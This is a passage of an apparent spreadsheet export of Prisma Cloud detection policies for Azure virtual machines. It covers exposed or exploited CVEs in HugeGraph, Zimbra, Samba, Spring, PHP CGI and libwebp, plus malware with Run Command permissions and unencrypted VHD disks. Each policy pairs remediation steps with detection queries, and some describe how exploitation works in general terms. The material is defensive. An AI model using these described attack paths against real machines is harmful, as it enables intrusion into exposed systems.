          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have a known exploitable Remote Code Execution (RCE) vulnerability (CVE-2024-27348).
CVE-2024-27348 is a critical vulnerability in Apache HugeGraph-Server that allows remote code execution (RCE). This means an attacker could potentially take control of the system if it’s running a vulnerable version of the software. The vulnerability exists because the software doesn’t properly sanitize user input, which allows attackers to inject Groovy code.
The affected software versions are Apache HugeGraph-Server versions before 1.3.0. An attacker can exploit this unauthenticated RCE via Groovy injection to take control of the system. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the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HugeGraph-Server (CVE-2024-27348) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2591" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of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
[Vulnerability]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-27348</t>
        </is>
      </c>
      <c r="Y2591" t="inlineStr"/>
      <c r="Z2591" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-27348'))</t>
        </is>
      </c>
      <c r="AA2591" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2591" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:46</t>
        </is>
      </c>
      <c r="AC2591" t="inlineStr"/>
      <c r="AD2591" t="b">
        <v>1</v>
      </c>
      <c r="AE2591" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2591" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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91" t="inlineStr">
        <is>
          <t>326ed23f-7224-4d60-8fc1-8915d9d49780</t>
        </is>
      </c>
      <c r="AI2591" t="inlineStr">
        <is>
          <t>e6724bf0-23af-4fcc-875f-8c8e9bc536b9</t>
        </is>
      </c>
      <c r="AJ2591" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2591" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2592">
      <c r="A2592" t="inlineStr"/>
      <c r="B2592" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2592" s="2" t="inlineStr"/>
      <c r="D2592" t="inlineStr"/>
      <c r="E2592" t="inlineStr"/>
      <c r="F2592" t="inlineStr"/>
      <c r="G2592" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2592" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2592" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Zimbra, CVE-2022-27925]</t>
        </is>
      </c>
      <c r="L2592" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2592" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2592" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2592" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2592" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2592" t="inlineStr"/>
      <c r="R2592" t="inlineStr"/>
      <c r="S2592" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2592" t="b">
        <v>0</v>
      </c>
      <c r="U2592" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2592" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2592" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[Zimbra, CVE-2022-27925]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Zimbra software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Zimbra RCE [CVE-2022-27925] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X259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CVE-2022-27925
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-27925</t>
        </is>
      </c>
      <c r="Y2592" t="inlineStr"/>
      <c r="Z2592" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-27925 - Zimbra RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-27925'))</t>
        </is>
      </c>
      <c r="AA2592" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2592" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:43</t>
        </is>
      </c>
      <c r="AC2592" t="inlineStr"/>
      <c r="AD2592" t="b">
        <v>1</v>
      </c>
      <c r="AE2592" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2592" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>53182cb1-2bf2-4c96-818f-d291c3a4ab57</t>
        </is>
      </c>
      <c r="AI2592" t="inlineStr">
        <is>
          <t>40f93549-dba2-46d6-a76d-2ca36118e4ec</t>
        </is>
      </c>
      <c r="AJ2592" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2592" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2593">
      <c r="A2593" t="inlineStr"/>
      <c r="B2593" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2593" s="2" t="inlineStr"/>
      <c r="D2593" t="inlineStr"/>
      <c r="E2593" t="inlineStr"/>
      <c r="F2593" t="inlineStr"/>
      <c r="G2593" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2593" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2593" t="inlineStr">
        <is>
          <t>Lateral movement and unauthorized command execution risk due to malware in Azure Virtual Machine with Run Command permissions</t>
        </is>
      </c>
      <c r="L2593" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE</t>
        </is>
      </c>
      <c r="M2593" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2593" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2593" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2593" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2593" t="inlineStr"/>
      <c r="R2593" t="inlineStr"/>
      <c r="S2593" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2593" t="b">
        <v>0</v>
      </c>
      <c r="U2593" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2593" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2593" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are affected by malware and have run command execution permissions.
The detection of grayware or malware within the Azure Virtual Machine poses a critical security threat, potentially enabling unauthorized access, data compromise, and operational disruption. The Run command execution permissions on the Azure Virtual Machine further could allow attackers to execute scripts or commands on the virtual machine and could laterally move across cloud accounts.
This policy checks for the following risky permissions:
'Microsoft.Compute/virtualMachines/runCommands/write', 'Microsoft.Compute/virtualMachines/runCommand/action'
Immediate attention is required to remediate the malware reported for the Azure Virtual Machine as soon as possible. Review and remove the run command execution permissions if are not intended, and grant only the least privileges required.</t>
        </is>
      </c>
      <c r="X2593"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if necessary</t>
        </is>
      </c>
      <c r="Y2593" t="inlineStr"/>
      <c r="Z2593" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Host contains Malware' or 'Host contains Grayware') and ('Azure VM instance with Run command permissions'))</t>
        </is>
      </c>
      <c r="AA2593" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2593" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:09</t>
        </is>
      </c>
      <c r="AC2593" t="inlineStr"/>
      <c r="AD2593" t="b">
        <v>1</v>
      </c>
      <c r="AE2593" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2593" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>06238e2b-0d03-46ff-b574-6ccd3b4486cd</t>
        </is>
      </c>
      <c r="AI2593" t="inlineStr">
        <is>
          <t>5c87e27c-fa83-4597-82fe-3d700c3e86c3</t>
        </is>
      </c>
      <c r="AJ2593" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2593" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2594">
      <c r="A2594" t="inlineStr"/>
      <c r="B2594" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2594" s="2" t="inlineStr"/>
      <c r="D2594" t="inlineStr"/>
      <c r="E2594" t="inlineStr"/>
      <c r="F2594" t="inlineStr"/>
      <c r="G2594" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2594" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2594" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Samba, CVE-2021-44142)</t>
        </is>
      </c>
      <c r="L2594" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2594" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2594" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2594" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2594" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2594" t="inlineStr"/>
      <c r="R2594" t="inlineStr"/>
      <c r="S2594" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2594" t="b">
        <v>0</v>
      </c>
      <c r="U2594" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2594" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2594" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2021-44142).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Samba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Samba (CVE-2021-44142) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2594"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CVE-2021-44142
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-44142</t>
        </is>
      </c>
      <c r="Y2594" t="inlineStr"/>
      <c r="Z2594" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-44142'))</t>
        </is>
      </c>
      <c r="AA2594" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2594" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:19</t>
        </is>
      </c>
      <c r="AC2594" t="inlineStr"/>
      <c r="AD2594" t="b">
        <v>1</v>
      </c>
      <c r="AE2594" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2594" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>07fd1ce1-9cab-4260-9560-e50691042da2</t>
        </is>
      </c>
      <c r="AI2594" t="inlineStr">
        <is>
          <t>cc72bf7b-bccd-4309-8055-83f3b066b159</t>
        </is>
      </c>
      <c r="AJ2594" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2594" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2595">
      <c r="A2595" t="inlineStr"/>
      <c r="B2595" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2595" s="2" t="inlineStr"/>
      <c r="D2595" t="inlineStr"/>
      <c r="E2595" t="inlineStr"/>
      <c r="F2595" t="inlineStr"/>
      <c r="G2595" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2595" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2595" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable Azure Virtual Machine [Java Spring Framework, CVE-2021-22119]</t>
        </is>
      </c>
      <c r="L2595" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2595" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2595" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2595" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2595" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2595" t="inlineStr"/>
      <c r="R2595" t="inlineStr"/>
      <c r="S2595" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2595" t="b">
        <v>0</v>
      </c>
      <c r="U2595" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2595" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2595" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have a known exploitable denial of service vulnerability [Java Spring Framework, CVE-2021-22119].
Denial of service vulnerability is a security flaw that allows a user to make a machine or network resource unavailable. Exploiting this vulnerability affects the availability of resources. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java Spring Framework [CVE-2021-22119] vulnerability and public exposure reported for the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X259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2595" t="inlineStr"/>
      <c r="Z2595" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-22119'))</t>
        </is>
      </c>
      <c r="AA2595" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2595" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:04</t>
        </is>
      </c>
      <c r="AC2595" t="inlineStr"/>
      <c r="AD2595" t="b">
        <v>1</v>
      </c>
      <c r="AE2595" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2595" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>01ec67ad-c43a-47bc-9117-f48a7748e920</t>
        </is>
      </c>
      <c r="AI2595" t="inlineStr">
        <is>
          <t>49a38b9d-63d1-4cd8-b9ae-110c28c9db69</t>
        </is>
      </c>
      <c r="AJ2595" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2595" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2596">
      <c r="A2596" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, CIS v2.1.0 (Azure) Level 2, CIS v2.0.0 (Azure) Level 2, ISO 27002:2022, CSA CCM v.4.0.6, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27001:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, PCI DSS v4.0, FFIEC, CIS v1.5.0 (Azure) - Level 2, CIS v1.4.0 (Azure), SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, Copy of Azure Security Benchmark (v3), PCI DSS v4.0, NIST CSF v2.0, Telecommunications Security Act - TSA, CIS v1.3.1 (Azure), CRI Profile v2.0, MTSBv2_Azure, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), NIST SP 800-171 Revision 3, Azure Security Benchmark (v3), PCI DSS v4.0, CIS v1.3.0 (Azure), Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, SOC 2, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, PCI DSS v4.0, Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, New Zealand Information Security Manual (NZISM v3.4), CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, CRI Profile v1.2.1, Azure Security Benchmark (v2), PCI DSS v4.0, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2596" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2596" s="2" t="inlineStr"/>
      <c r="D2596" t="inlineStr"/>
      <c r="E2596" t="inlineStr"/>
      <c r="F2596" t="inlineStr"/>
      <c r="G2596" t="b">
        <v>0</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2596" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2596" t="inlineStr">
        <is>
          <t>Azure Storage account containing VHD OS disk is not encrypted with CMK</t>
        </is>
      </c>
      <c r="L2596" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2596" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2596" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2596" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2596" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2596" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2596" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2596" t="inlineStr"/>
      <c r="T2596" t="b">
        <v>0</v>
      </c>
      <c r="U2596" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2596" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2596" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage account containing VHD OS disk which are not encrypted with CMK. VHD's attached to Virtual Machines are stored in Azure storage. By default Azure Storage account is encrypted using Microsoft Managed Keys. It is recommended to use Customer Managed Keys to encrypt data in Azure Storage accounts for better control on the data.</t>
        </is>
      </c>
      <c r="X2596" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Storage accounts dashboard and Click on the reported storage account
3. Under the Settings menu, click on Encryption
4. Select Customer Managed Keys
- Choose 'Enter key URI' and Enter 'Key URI'
OR
- Choose 'Select from Key Vault', Enter 'Key Vault' and 'Encryption Key'
5. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2596" t="inlineStr"/>
      <c r="Z2596" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = ['properties.storageProfile'].osDisk.vhd.uri exists as X; config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.encryption.keySource equals "Microsoft.Storage" as Y; filter "$.['X'].['properties.storageProfile'].['osDisk'].['vhd'].['uri'] contains $.Y.name"; show Y;</t>
        </is>
      </c>
      <c r="AA2596" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2596" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2596" t="inlineStr">
        <is>
          <t>PC-AZR-STO-729</t>
        </is>
      </c>
      <c r="AD2596" t="b">
        <v>1</v>
      </c>
      <c r="AE2596" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2596" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>0cd3b371-0969-48ce-9d61-17b61ce9907c</t>
        </is>
      </c>
      <c r="AI2596" t="inlineStr">
        <is>
          <t>895356d9-9336-4e13-8998-7068e7526bc9</t>
        </is>
      </c>
      <c r="AJ2596" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2596" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2597">
      <c r="A2597" t="inlineStr"/>
      <c r="B2597" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2597" s="2" t="inlineStr"/>
      <c r="D2597" t="inlineStr"/>
      <c r="E2597" t="inlineStr"/>
      <c r="F2597" t="inlineStr"/>
      <c r="G2597" t="b">
        <v>1</v>
      </c>
      <c r="H25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97" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2597" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2597" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed Azure Virtual Machine with PHP CGI Argument Injection vulnerability (PHP, CVE-2024-4577)</t>
        </is>
      </c>
      <c r="L2597" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2597" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2597" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2597" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2597" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2597" t="inlineStr"/>
      <c r="R2597" t="inlineStr"/>
      <c r="S2597" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2597" t="b">
        <v>0</v>
      </c>
      <c r="U2597" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2597" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2597" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual machines that are publicly exposed and have a known exploitable Remote Code Execution vulnerability affecting PHP CGI  (CVE-2024-4577).
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability affecting the PHP CGI component of PHP installed on Windows Operating Systems. The PHP CGI module on Windows, when used with Apache, has a flaw where certain characters in command lines can be misunderstood as PHP commands. This happens because Windows may change characters using \"Best-Fit\" behavior with specific code pages. 
Attackers can exploit this vulnerability by crafting requests with specially designed characters, enabling them to inject options into the PHP binary's execution. This can result in running unauthorized PHP code, exposing sensitive data, and performing other malicious actions on the server. The fact that the Azure Virtual machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the PHP (CVE-2024-4577) vulnerability and public exposure reported for the Azure Virtual machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2597" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported Virtual machines based on your business requirements by modifying Network security group rules to the trusted IP address.
To modify Network security group rules,
1. Sign in to the Azure Portal
2. Select 'All services'
3. Select 'Virtual Machines' under Compute
4. Identify the Virtual machine that you want to restrict access to the Internet
4. Under 'Settings' click on 'Networking'
5. In the 'Inbound port rules' section, select the rule that allows Internet access (0.0.0.0/0) for ports (http/80, https/443) to the trusted IP address
   Refer following link for detailed steps to modify Network security group rules,
   https://learn.microsoft.com/en-us/azure/virtual-network/manage-network-security-group?tabs=network-security-group-portal#change-a-security-rule
NOTE: When modifying Network security group rules, ensure you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-4577
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-4577</t>
        </is>
      </c>
      <c r="Y2597" t="inlineStr"/>
      <c r="Z2597" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2024-4577'))</t>
        </is>
      </c>
      <c r="AA2597" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2597" t="inlineStr">
        <is>
          <t>2024-08-19 06:33:22</t>
        </is>
      </c>
      <c r="AC2597" t="inlineStr"/>
      <c r="AD2597" t="b">
        <v>1</v>
      </c>
      <c r="AE2597" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2597" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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97" t="inlineStr">
        <is>
          <t>ee624da2-7a34-46c6-8f1e-7f04143bde01</t>
        </is>
      </c>
      <c r="AI2597" t="inlineStr">
        <is>
          <t>f428c3a5-11ce-4b1e-89b0-a492488c41cd</t>
        </is>
      </c>
      <c r="AJ2597" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2597" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2598">
      <c r="A2598" t="inlineStr"/>
      <c r="B2598" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2598" s="2" t="inlineStr"/>
      <c r="D2598" t="inlineStr"/>
      <c r="E2598" t="inlineStr"/>
      <c r="F2598" t="inlineStr"/>
      <c r="G2598" t="b">
        <v>1</v>
      </c>
      <c r="H25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598" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2598" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2598" t="inlineStr">
        <is>
          <t>Remote code execution and lateral movement risk due to publicly exposed Azure virtual machine with overly permissive IAM role and known exploitable vulnerability [libwebp, CVE-2023-4863]</t>
        </is>
      </c>
      <c r="L2598" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2598" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2598" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2598" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2598" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2598" t="inlineStr"/>
      <c r="R2598" t="inlineStr"/>
      <c r="S2598" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2598" t="b">
        <v>0</v>
      </c>
      <c r="U2598" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2598" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2598" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have a known exploitable remote code execution vulnerability in libwebp [CVE-2023-4863]. Additionally, these instances have been detected with overly permissive IAM roles, which significantly increases the risk of lateral movement within the infrastructure. 
Remote code execution is a severe security concern, allowing unauthorized users to execute arbitrary code on the targeted system. When combined with excessive permissions, this poses a heightened risk, enabling attackers not only to compromise the vulnerable system but also to move laterally within the environment. 
Immediate attention is required to remediate the libwebp [CVE-2023-4863] vulnerability, review and restrict the IAM role permissions, and address the public exposure of the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2598"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[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2023-4863
2. Perform thorough backups of software configurations and data before applying updates
